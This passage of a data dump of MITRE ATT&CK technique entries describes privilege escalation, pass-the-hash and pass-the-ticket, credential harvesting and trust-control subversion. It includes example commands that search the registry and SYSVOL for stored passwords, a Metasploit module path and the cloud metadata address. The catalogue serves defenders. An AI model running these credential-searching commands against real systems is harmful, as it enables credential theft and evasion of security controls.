                              'privileges in order to install malicious software on victims and install persistence '
                              "mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon "
                              'Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into '
                              'granting escalated privileges to malicious code.(Citation: Death by 1000 installers; '
                              "it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been "
                              'shown to work by modifying legitimate programs present on the machine that make use of '
                              "this API.(Citation: Death by 1000 installers; it's all broken!)",
               'name': 'Elevated Execution with Prompt',
               'platforms': ['macOS']},
 'T1548.005': {'attack_id': 'T1548.005',
               'categories': ['privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may abuse permission configurations that allow them to gain temporarily '
                              'elevated access to cloud resources. Many cloud environments allow administrators to '
                              'grant user or service accounts permission to request just-in-time access to roles, '
                              'impersonate other accounts, pass roles onto resources and services, or otherwise gain '
                              'short-term access to a set of privileges that may be distinct from their own. \n'
                              '\n'
                              'Just-in-time access is a mechanism for granting additional roles to cloud accounts in a '
                              'granular, temporary manner. This allows accounts to operate with only the permissions '
                              'they need on a daily basis, and to request additional permissions as necessary. '
                              'Sometimes just-in-time access requests are configured to require manual approval, while '
                              'other times the desired permissions are automatically granted.(Citation: Azure Just in '
                              'Time Access 2023)\n'
                              '\n'
                              'Account impersonation allows user or service accounts to temporarily act with the '
                              'permissions of another account. For example, in GCP users with the '
                              '`iam.serviceAccountTokenCreator` role can create temporary access tokens or sign '
                              'arbitrary payloads with the permissions of a service account, while service accounts '
                              'with domain-wide delegation permission are permitted to impersonate Google Workspace '
                              'accounts.(Citation: Google Cloud Service Account Authentication Roles)(Citation: '
                              'Hunters Domain Wide Delegation Google Workspace 2023)(Citation: Google Cloud Just in '
                              'Time Access 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain Wide Delegation '
                              '2023) In Exchange Online, the `ApplicationImpersonation` role allows a service account '
                              'to use the permissions associated with specified user accounts.(Citation: Microsoft '
                              'Impersonation and EWS in Exchange) \n'
                              '\n'
                              'Many cloud environments also include mechanisms for users to pass roles to resources '
                              'that allow them to perform tasks and authenticate to other services. While the user '
                              'that creates the resource does not directly assume the role they pass to it, they may '
                              "still be able to take advantage of the role's access -- for example, by configuring the "
                              'resource to perform certain actions with the permissions it has been granted. In AWS, '
                              'users with the `PassRole` permission can allow a service they create to assume a given '
                              'role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service '
                              'account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account '
                              'Authentication Roles)\n'
                              '\n'
                              'While users require specific role assignments in order to use any of these features, '
                              'cloud administrators may misconfigure permissions. This could result in escalation '
                              'paths that allow adversaries to gain access to resources beyond what was originally '
                              'intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security '
                              'Labs AWS Privilege Escalation)\n'
                              '\n'
                              '**Note:** this technique is distinct from [Additional Cloud '
                              'Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning '
                              'permanent roles to accounts rather than abusing existing permissions structures to gain '
                              'temporarily elevated access to resources. However, adversaries that compromise a '
                              'sufficiently privileged account may grant another account they control [Additional '
                              'Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to '
                              'also abuse these features. This may also allow for greater stealth than would be had by '
                              'directly using the highly privileged account, especially when logs do not clarify when '
                              'role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)',
               'name': 'Temporary Elevated Cloud Access',
               'platforms': ['IaaS', 'Azure AD', 'Office 365', 'Google Workspace']},
 'T1548.006': {'attack_id': 'T1548.006',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service '
                              'or database to execute malicious applications with elevated permissions. TCC is a '
                              'Privacy & Security macOS control mechanism used to determine if the running process has '
                              'permission to access the data or services protected by TCC, such as screen sharing, '
                              'camera, microphone, or Full Disk Access (FDA).\n'
                              '\n'
                              'When an application requests to access data or a service protected by TCC, the TCC '
                              'daemon (`tccd`) checks the TCC database, located at `/Library/Application '
                              'Support/com.apple.TCC/TCC.db` (and `~/` equivalent), for existing permissions. If '
                              'permissions do not exist, then the user is prompted to grant permission. Once '
                              "permissions are granted, the database stores the application's permissions and will not "
                              'prompt the user again unless reset. For example, when a web browser requests '
                              "permissions to the user's webcam, once granted the web browser may not explicitly "
                              'prompt the user again.(Citation: welivesecurity TCC)\n'
                              '\n'
                              'Adversaries may manipulate the TCC database or otherwise abuse the TCC service to '
                              'execute malicious content. This can be done in various ways, including using privileged '
                              'system applications to execute malicious payloads or manipulating the database to grant '
                              'their application TCC permissions. \n'
                              '\n'
                              'For example, adversaries can use Finder, which has FDA permissions by default, to '
                              'execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) while '
                              'preventing a user prompt. For a system without System Integrity Protection (SIP) '
                              'enabled, adversaries have also manipulated the operating system to load an adversary '
                              'controlled TCC database using environment variables and '
                              '[Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS '
                              'bypass)(Citation: TCC Database)\n'
                              '\n'
                              'Adversaries may also opt to instead inject code (e.g., [Process '
                              'Injection](https://attack.mitre.org/techniques/T1055)) into targeted applications with '
                              'the desired TCC permissions.\n',
               'name': 'TCC Manipulation',
               'platforms': ['macOS']},
 'T1550': {'attack_id': 'T1550',
           'categories': ['defense-evasion', 'lateral-movement'],
           'description': 'Adversaries may use alternate authentication material, such as password hashes, Kerberos '
                          'tickets, and application access tokens, in order to move laterally within an environment '
                          'and bypass normal system access controls. \n'
                          '\n'
                          'Authentication processes generally require a valid identity (e.g., username) along with one '
                          'or more authentication factors (e.g., password, pin, physical smart card, token generator, '
                          'etc.). Alternate authentication material is legitimately generated by systems after a user '
                          'or application successfully authenticates by providing a valid identity and the required '
                          'authentication factor(s). Alternate authentication material may also be generated during '
                          'the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)\n'
                          '\n'
                          'Caching alternate authentication material allows the system to verify an identity has '
                          'successfully authenticated without asking the user to reenter authentication factor(s). '
                          'Because the alternate authentication must be maintained by the system—either in memory or '
                          'on disk—it may be at risk of being stolen through [Credential '
                          'Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate '
                          'authentication material, adversaries are able to bypass system access controls and '
                          'authenticate to systems without knowing the plaintext password or any additional '
                          'authentication factors.\n',
           'name': 'Use Alternate Authentication Material',
           'platforms': ['Windows', 'Office 365', 'SaaS', 'Google Workspace', 'IaaS', 'Containers']},
 'T1550.001': {'attack_id': 'T1550.001',
               'categories': ['defense-evasion', 'lateral-movement'],
               'description': 'Adversaries may use stolen application access tokens to bypass the typical '
                              'authentication process and access restricted accounts, information, or services on '
                              'remote systems. These tokens are typically stolen from users or services and used in '
                              'lieu of login credentials.\n'
                              '\n'
                              'Application access tokens are used to make authorized API requests on behalf of a user '
                              'or service and are commonly used to access resources in cloud, container-based '
                              'applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always '
                              'Use Access Tokens to Secure APIs Sept 2019) \n'
                              '\n'
                              'OAuth is one commonly implemented framework that issues tokens to users for access to '
                              'systems. These frameworks are used collaboratively to verify the user and determine '
                              'what actions the user is allowed to perform. Once identity is established, the token '
                              'allows actions to be authorized, without passing the actual credentials of the user. '
                              'Therefore, compromise of the token can grant the adversary access to resources of other '
                              'sites through a malicious application.(Citation: okta)\n'
                              '\n'
                              'For example, with a cloud-based email service, once an OAuth access token is granted to '
                              'a malicious application, it can potentially gain long-term access to features of the '
                              'user account if a "refresh" token enabling background access is awarded.(Citation: '
                              'Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can '
                              'use the user-granted REST API to perform functions such as email searching and contact '
                              'enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n'
                              '\n'
                              'Compromised access tokens may be used as an initial step in compromising other '
                              'services. For example, if a token grants access to a victim’s primary email, the '
                              'adversary may be able to extend access to all other services which the target '
                              'subscribes by triggering forgotten password routines. In AWS and GCP environments, '
                              'adversaries can trigger a request for a short-lived access token with the privileges of '
                              'another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS '
                              'Temporary Security Credentials) The adversary can then use this token to request data '
                              'or perform actions the original account could not. If permissions for this feature are '
                              'misconfigured – for example, by allowing all users to request a token for a particular '
                              'account - an adversary may be able to gain initial access to a Cloud Account or '
                              'escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)\n'
                              '\n'
                              'Direct API access through a token negates the effectiveness of a second authentication '
                              'factor and may be immune to intuitive countermeasures like changing passwords.  For '
                              'example, in AWS environments, an adversary who compromises a user’s AWS API credentials '
                              'may be able to use the `sts:GetFederationToken` API call to create a federated user '
                              'session, which will have the same permissions as the original user but may persist even '
                              'if the original user credentials are deactivated.(Citation: Crowdstrike AWS User '
                              'Federation Persistence) Additionally, access abuse over an API channel can be difficult '
                              'to detect even from the service provider end, as the access can still align well with a '
                              'legitimate workflow.',
               'name': 'Application Access Token',
               'platforms': ['Office 365', 'SaaS', 'Google Workspace', 'Containers', 'IaaS', 'Azure AD']},
 'T1550.002': {'attack_id': 'T1550.002',
               'categories': ['defense-evasion', 'lateral-movement'],
               'description': 'Adversaries may “pass the hash” using stolen password hashes to move laterally within '
                              'an environment, bypassing normal system access controls. Pass the hash (PtH) is a '
                              "method of authenticating as a user without having access to the user's cleartext "
                              'password. This method bypasses standard authentication steps that require a cleartext '
                              'password, moving directly into the portion of the authentication that uses the password '
                              'hash.\n'
                              '\n'
                              'When performing PtH, valid password hashes for the account being used are captured '
                              'using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. '
                              'Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH '
                              'may be used to perform actions on local or remote systems.\n'
                              '\n'
                              'Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, '
                              'this involves using a password hash to authenticate as a user but also uses the '
                              'password hash to create a valid Kerberos ticket. This ticket can then be used to '
                              'perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) '
                              'attacks.(Citation: Stealthbits Overpass-the-Hash)',
               'name': 'Pass the Hash',
               'platforms': ['Windows']},
 'T1550.003': {'attack_id': 'T1550.003',
               'categories': ['defense-evasion', 'lateral-movement'],
               'description': 'Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally '
                              'within an environment, bypassing normal system access controls. Pass the ticket (PtT) '
                              'is a method of authenticating to a system using Kerberos tickets without having access '
                              "to an account's password. Kerberos authentication can be used as the first step to "
                              'lateral movement to a remote system.\n'
                              '\n'
                              'When preforming PtT, valid Kerberos tickets for [Valid '
                              'Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential '
                              "Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket "
                              'granting ticket (TGT) may be obtained, depending on the level of access. A service '
                              'ticket allows for access to a particular resource, whereas a TGT can be used to request '
                              'service tickets from the Ticket Granting Service (TGS) to access any resource the user '
                              'has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: '
                              'GentilKiwi Pass the Ticket)\n'
                              '\n'
                              'A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for '
                              'services that use Kerberos as an authentication mechanism and are used to generate '
                              'tickets to access that particular resource and the system that hosts the resource '
                              '(e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)\n'
                              '\n'
                              'A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for '
                              'the domain using the Key Distribution Service account KRBTGT account NTLM hash, which '
                              'enables generation of TGTs for any account in Active Directory.(Citation: Campbell '
                              '2014)\n'
                              '\n'
                              'Adversaries may also create a valid Kerberos ticket using other user information, such '
                              'as stolen password hashes or AES keys. For example, "overpassing the hash" involves '
                              'using a NTLM password hash to authenticate as a user (i.e. [Pass the '
                              'Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password '
                              'hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)',
               'name': 'Pass the Ticket',
               'platforms': ['Windows']},
 'T1550.004': {'attack_id': 'T1550.004',
               'categories': ['defense-evasion', 'lateral-movement'],
               'description': 'Adversaries can use stolen session cookies to authenticate to web applications and '
                              'services. This technique bypasses some multi-factor authentication protocols since the '
                              'session is already authenticated.(Citation: Pass The Cookie)\n'
                              '\n'
                              'Authentication cookies are commonly used in web applications, including cloud-based '
                              'services, after a user has authenticated to the service so credentials are not passed '
                              'and re-authentication does not need to occur as frequently. Cookies are often valid for '
                              'an extended period of time, even if the web application is not actively used. After the '
                              'cookie is obtained through [Steal Web Session '
                              'Cookie](https://attack.mitre.org/techniques/T1539) or [Web '
                              'Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import '
                              'the cookie into a browser they control and is then able to use the site or application '
                              'as the user for as long as the session cookie is active. Once logged into the site, an '
                              'adversary can access sensitive information, read email, or perform actions that the '
                              'victim account has permissions to perform.\n'
                              '\n'
                              'There have been examples of malware targeting session cookies to bypass multi-factor '
                              'authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)',
               'name': 'Web Session Cookie',
               'platforms': ['Office 365', 'SaaS', 'Google Workspace', 'IaaS']},
 'T1552': {'attack_id': 'T1552',
           'categories': ['credential-access'],
           'description': 'Adversaries may search compromised systems to find and obtain insecurely stored '
                          'credentials. These credentials can be stored and/or misplaced in many locations on a '
                          'system, including plaintext files (e.g. [Bash '
                          'History](https://attack.mitre.org/techniques/T1552/003)), operating system or '
                          'application-specific repositories (e.g. [Credentials in '
                          'Registry](https://attack.mitre.org/techniques/T1552/002)),  or other specialized '
                          'files/artifacts (e.g. [Private '
                          'Keys](https://attack.mitre.org/techniques/T1552/004)).(Citation: Brining MimiKatz to Unix)',
           'name': 'Unsecured Credentials',
           'platforms': ['Windows',
                         'Azure AD',
                         'Office 365',
                         'SaaS',
                         'IaaS',
                         'Linux',
                         'macOS',
                         'Google Workspace',
                         'Containers',
                         'Network']},
 'T1552.001': {'attack_id': 'T1552.001',
               'categories': ['credential-access'],
               'description': 'Adversaries may search local file systems and remote file shares for files containing '
                              'insecurely stored credentials. These can be files created by users to store their own '
                              'credentials, shared credential stores for a group of individuals, configuration files '
                              'containing passwords for a system or service, or source code/binary files containing '
                              'embedded passwords.\n'
                              '\n'
                              'It is possible to extract passwords from backups or saved virtual machines through [OS '
                              'Credential Dumping](https://attack.mitre.org/techniques/T1003).(Citation: CG 2014) '
                              'Passwords may also be obtained from Group Policy Preferences stored on the Windows '
                              'Domain Controller.(Citation: SRD GPP)\n'
                              '\n'
                              'In cloud and/or containerized environments, authenticated user and service account '
                              'credentials are often stored in local configuration and credential files.(Citation: '
                              'Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands '
                              'in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these '
                              'files can be copied and reused on another machine or the contents can be read and then '
                              'used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud '
                              'Credential Storage)',
               'name': 'Credentials In Files',
               'platforms': ['Windows', 'IaaS', 'Linux', 'macOS', 'Containers']},
 'T1552.002': {'attack_id': 'T1552.002',
               'categories': ['credential-access'],
               'description': 'Adversaries may search the Registry on compromised systems for insecurely stored '
                              'credentials. The Windows Registry stores configuration information that can be used by '
                              'the system or other programs. Adversaries may query the Registry looking for '
                              'credentials and passwords that have been stored for use by other programs or services. '
                              'Sometimes these credentials are used for automatic logons.\n'
                              '\n'
                              'Example commands to find Registry keys related to password information: (Citation: '
                              'Pentestlab Stored Credentials)\n'
                              '\n'
                              '* Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>\n'
                              '* Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code>',
               'name': 'Credentials in Registry',
               'platforms': ['Windows']},
 'T1552.003': {'attack_id': 'T1552.003',
               'categories': ['credential-access'],
               'description': 'Adversaries may search the bash command history on compromised systems for insecurely '
                              'stored credentials. Bash keeps track of the commands users type on the command-line '
                              'with the "history" utility. Once a user logs out, the history is flushed to the user’s '
                              '<code>.bash_history</code> file. For each user, this file resides at the same location: '
                              '<code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 '
                              'commands. Users often type usernames and passwords on the command-line as parameters to '
                              'programs, which then get saved to this file when they log out. Adversaries can abuse '
                              'this by looking through the file for potential credentials. (Citation: External to DA, '
                              'the OS X Way)',
               'name': 'Bash History',
               'platforms': ['Linux', 'macOS']},
 'T1552.004': {'attack_id': 'T1552.004',
               'categories': ['credential-access'],
               'description': 'Adversaries may search for private key certificate files on compromised systems for '
                              'insecurely stored credentials. Private cryptographic keys and certificates are used for '
                              'authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia '
                              'Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, '
                              '.gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n'
                              '\n'
                              'Adversaries may also look in common key directories, such as <code>~/.ssh</code> for '
                              'SSH keys on * nix-based systems or '
                              '<code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code> on Windows. Adversary tools may '
                              'also search compromised systems for file extensions relating to cryptographic keys and '
                              'certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n'
                              '\n'
                              'When a device is registered to Azure AD, a device key and a transport key are generated '
                              'and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An '
                              'adversary with access to the device may be able to export the keys in order to '
                              'impersonate the device.(Citation: AADInternals Azure AD Device Identities)\n'
                              '\n'
                              'On network devices, private keys may be exported via [Network Device '
                              'CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki '
                              'export`.(Citation: cisco_deploy_rsa_keys) \n'
                              '\n'
                              'Some private keys require a password or passphrase for operation, so an adversary may '
                              'also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or '
                              'attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase '
                              'off-line. These private keys can be used to authenticate to [Remote '
                              'Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting '
                              'other collected files such as email.',
               'name': 'Private Keys',
               'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1552.005': {'attack_id': 'T1552.005',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to access the Cloud Instance Metadata API to collect '
                              'credentials and other sensitive data.\n'
                              '\n'
                              'Most cloud service providers support a Cloud Instance Metadata API which is a service '
                              'provided to running virtual instances that allows applications to access information '
                              'about the running virtual instance. Available information generally includes name, '
                              'security group, and additional metadata including sensitive data such as credentials '
                              'and UserData scripts that may contain additional secrets. The Instance Metadata API is '
                              'provided as a convenience to assist in managing applications and is accessible by '
                              'anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud '
                              'metadata API has been used in at least one high profile compromise.(Citation: Krebs '
                              'Capital One August 2019)\n'
                              '\n'
                              'If adversaries have a presence on the running virtual instance, they may query the '
                              'Instance Metadata API directly to identify credentials that grant access to additional '
                              'resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) '
                              'vulnerability in a public facing web proxy that allows them to gain access to the '
                              'sensitive information via a request to the Instance Metadata API.(Citation: RedLock '
                              'Instance Metadata API 2018)\n'
                              '\n'
                              'The de facto standard across cloud service providers is to host the Instance Metadata '
                              'API at <code>http[:]//169.254.169.254</code>.\n',
               'name': 'Cloud Instance Metadata API',
               'platforms': ['IaaS']},
 'T1552.006': {'attack_id': 'T1552.006',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to find unsecured credentials in Group Policy Preferences '
                              '(GPP). GPP are tools that allow administrators to create domain policies with embedded '
                              'credentials. These policies allow administrators to set local accounts.(Citation: '
                              'Microsoft GPP 2016)\n'
                              '\n'
                              'These group policies are stored in SYSVOL on a domain controller. This means that any '
                              'domain user can view the SYSVOL share and decrypt the password (using the AES key that '
                              'has been made public).(Citation: Microsoft GPP Key)\n'
                              '\n'
                              'The following tools and scripts can be used to gather and decrypt the password file '
                              'from Group Policy Preference XML files:\n'
                              '\n'
                              '* Metasploit’s post exploitation module: '
                              '<code>post/windows/gather/credentials/gpp</code>\n'
                              '* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)\n'
                              '* gpprefdecrypt.py\n'
                              '\n'
                              'On the SYSVOL share, adversaries may use the following command to enumerate potential '
                              'GPP XML files: <code>dir /s * .xml</code>\n',
               'name': 'Group Policy Preferences',
               'platforms': ['Windows']},
 'T1552.007': {'attack_id': 'T1552.007',
               'categories': ['credential-access'],
               'description': 'Adversaries may gather credentials via APIs within a containers environment. APIs in '
                              'these environments, such as the Docker API and Kubernetes APIs, allow a user to '
                              'remotely manage their container resources and cluster components.(Citation: Docker '
                              'API)(Citation: Kubernetes API)\n'
                              '\n'
                              'An adversary may access the Docker API to collect logs that contain credentials to '
                              'cloud, container, and various other resources in the environment.(Citation: Unit 42 '
                              "Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's "
                              'service account, may also use the Kubernetes API to retrieve credentials from the '
                              'Kubernetes API server. These credentials may include those needed for Docker API '
                              'authentication or secrets from Kubernetes cluster components. ',
               'name': 'Container API',
               'platforms': ['Containers']},
 'T1552.008': {'attack_id': 'T1552.008',
               'categories': ['credential-access'],
               'description': 'Adversaries may directly collect unsecured credentials stored or passed through user '
                              'communication services. Credentials may be sent and stored in user chat communication '
                              'applications such as email, chat services like Slack or Teams, collaboration tools like '
                              'Jira or Trello, and any other services that support user communication. Users may share '
                              'various forms of credentials (such as usernames and passwords, API keys, or '
                              'authentication tokens) on private or public corporate internal communications '
                              'channels.\n'
                              '\n'
                              'Rather than accessing the stored chat logs (i.e., [Credentials In '
                              'Files](https://attack.mitre.org/techniques/T1552/001)), adversaries may directly access '
                              'credentials within these services on the user endpoint, through servers hosting the '
                              'services, or through administrator portals for cloud hosted services. Adversaries may '
                              'also compromise integration tools like Slack Workflows to automatically search through '
                              'messages to extract user credentials. These credentials may then be abused to perform '
                              'follow-on activities such as lateral movement or privilege escalation (Citation: Slack '
                              'Security Risks).',
               'name': 'Chat Messages',
               'platforms': ['Office 365', 'SaaS', 'Google Workspace']},
 'T1553': {'attack_id': 'T1553',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may undermine security controls that will either warn users of untrusted '
                          'activity or prevent execution of untrusted programs. Operating systems and security '
                          'products may contain mechanisms to identify programs or websites as possessing some level '
                          'of trust. Examples of such features would include a program being allowed to run because it '
                          'is signed by a valid code signing certificate, a program prompting the user with a warning '
                          'because it has an attribute set from being downloaded from the Internet, or getting an '
                          'indication that you are about to connect to an untrusted site.\n'
                          '\n'
                          'Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will '
                          'depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and '
                          'Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify '
                          'Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these '
                          'controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or '
                          'steal code signing certificates to acquire trust on target systems.(Citation: Securelist '
                          'Digital Certificates)(Citation: Symantec Digital Certificates) ',
           'name': 'Subvert Trust Controls',
           'platforms': ['Windows', 'macOS', 'Linux']},
 'T1553.001': {'attack_id': 'T1553.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may modify file attributes and subvert Gatekeeper functionality to evade '
                              'user prompts and execute untrusted programs. Gatekeeper is a set of technologies that '
                              'act as layer of Apple’s security model to ensure only trusted applications are executed '
                              'on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) '
                              'and has grown to include Code Signing, security policy compliance, Notarization, and '
                              'more. Gatekeeper also treats applications running for the first time differently than '
                              'reopened applications.(Citation: TheEclecticLightCompany Quarantine and the '
                              'flag)(Citation: TheEclecticLightCompany apple notarization )\n'
                              '\n'
                              'Based on an opt-in system, when files are downloaded an extended attribute (xattr) '
                              'called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file '
                              'by the application performing the download. Launch Services opens the application in a '
                              'suspended state. For first run applications with the quarantine flag set, Gatekeeper '
                              'executes the following functions:\n'
                              '\n'
                              '1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides '
                              'an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS '
                              'X)(Citation: 20 macOS Common Tools and Techniques)\n'
                              '\n'
                              '2. Checks System Policies - Gatekeeper checks the system security policy, allowing '
                              'execution of apps downloaded from either just the App Store or the App Store and '
                              'identified developers.\n'
                              '\n'
                              '3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer '
                              'ID.\n'
                              '\n'
                              '4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to '
                              'Apple servers to verify or pull down the notarization ticket and ensure the ticket is '
                              'not revoked. Users can override notarization, which will result in a prompt of '
                              'executing an “unauthorized app” and the security policy will be modified.\n'
                              '\n'
                              'Adversaries can subvert one or multiple security controls within Gatekeeper checks '
                              'through logic errors (e.g. [Exploitation for Defense '
                              'Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and '
                              'external libraries. For example, prior to macOS 13 Ventura, code signing and '
                              'notarization checks were only conducted on first launch, allowing adversaries to write '
                              'malicious executables to previously opened applications in order to bypass Gatekeeper '
                              'security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application '
                              'Bundle Manipulation Brandon Dalton)\n'
                              '\n'
                              'Applications and files loaded onto the system from a USB flash drive, optical disk, '
                              'external hard drive, from a drive shared over the local network, or using the curl '
                              'command may not set the quarantine flag. Additionally, it is possible to avoid setting '
                              'the quarantine flag using [Drive-by '
                              'Compromise](https://attack.mitre.org/techniques/T1189).',
               'name': 'Gatekeeper Bypass',
               'platforms': ['macOS']},
 'T1553.002': {'attack_id': 'T1553.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may create, acquire, or steal code signing materials to sign their malware '
                              'or tools. Code signing provides a level of authenticity on a binary from the developer '
                              'and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code '
                              'Signing) The certificates used during an operation may be created, acquired, or stolen '
                              'by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec '
                              'Digital Certificates) Unlike [Invalid Code '
                              'Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in '
                              'a valid signature.\n'
                              '\n'
                              'Code signing to verify software on first run can be used on modern Windows and macOS '
                              'systems. It is not used on Linux due to the decentralized nature of the platform. '
                              '(Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)\n'
                              '\n'
                              'Code signing certificates may be used to bypass security policies that require signed '
                              'code to execute on a system. ',
               'name': 'Code Signing',
               'platforms': ['macOS', 'Windows']},
 'T1553.003': {'attack_id': 'T1553.003',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may tamper with SIP and trust provider components to mislead the operating '
                              'system and application control tools when conducting signature validation checks. In '
                              'user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures '
                              "are used to verify a file's origin and integrity, variables that may be used to "
                              'establish trust in signed code (ex: a driver with a valid Microsoft signature may be '
                              'handled as safe). The signature validation process is handled via the WinVerifyTrust '
                              'application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) '
                              'which accepts an inquiry and coordinates with the appropriate trust provider, which is '
                              'responsible for validating parameters of a signature. (Citation: SpectorOps Subverting '
                              'Trust Sept 2017)\n'
                              '\n'
                              'Because of the varying executable file types and corresponding signature formats, '
                              'Microsoft created software components called Subject Interface Packages (SIPs) '
                              '(Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API '
                              'functions and files. SIPs are responsible for enabling API functions to create, '
                              'retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats '
                              '(Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  '
                              '(Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by '
                              'globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n'
                              '\n'
                              'Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries '
                              'may abuse this architecture to subvert trust controls and bypass security policies that '
                              'allow only legitimately signed code to execute on a system. Adversaries may hijack SIP '
                              'and trust provider components to mislead operating system and application control tools '
                              'to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting '
                              'Trust Sept 2017)\n'
                              '\n'
                              '* Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in '
                              '<code>HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType '
                              '0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID}</code> that point to the dynamic link '
                              'library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves '
                              'an encoded digital certificate from a signed file. By pointing to a maliciously-crafted '
                              'DLL with an exported function that always returns a known good signature value (ex: a '
                              'Microsoft signature for Portable Executables) rather than the file’s real signature, an '
                              'adversary can apply an acceptable signature value to all files using that SIP '
                              '(Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, '
                              'invalidating the signature, since the hash returned by the function will not match the '
                              'value computed from the file).\n'
                              '* Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in '
                              '<code>HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType '
                              '0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID}</code> that point to the DLL providing a '
                              'SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash '
                              'against the signed hash value. By pointing to a maliciously-crafted DLL with an '
                              'exported function that always returns TRUE (indicating that the validation was '
                              'successful), an adversary can successfully validate any file (with a legitimate '
                              'signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without '
                              'hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry '
                              'value could also be redirected to a suitable exported function from an already present '
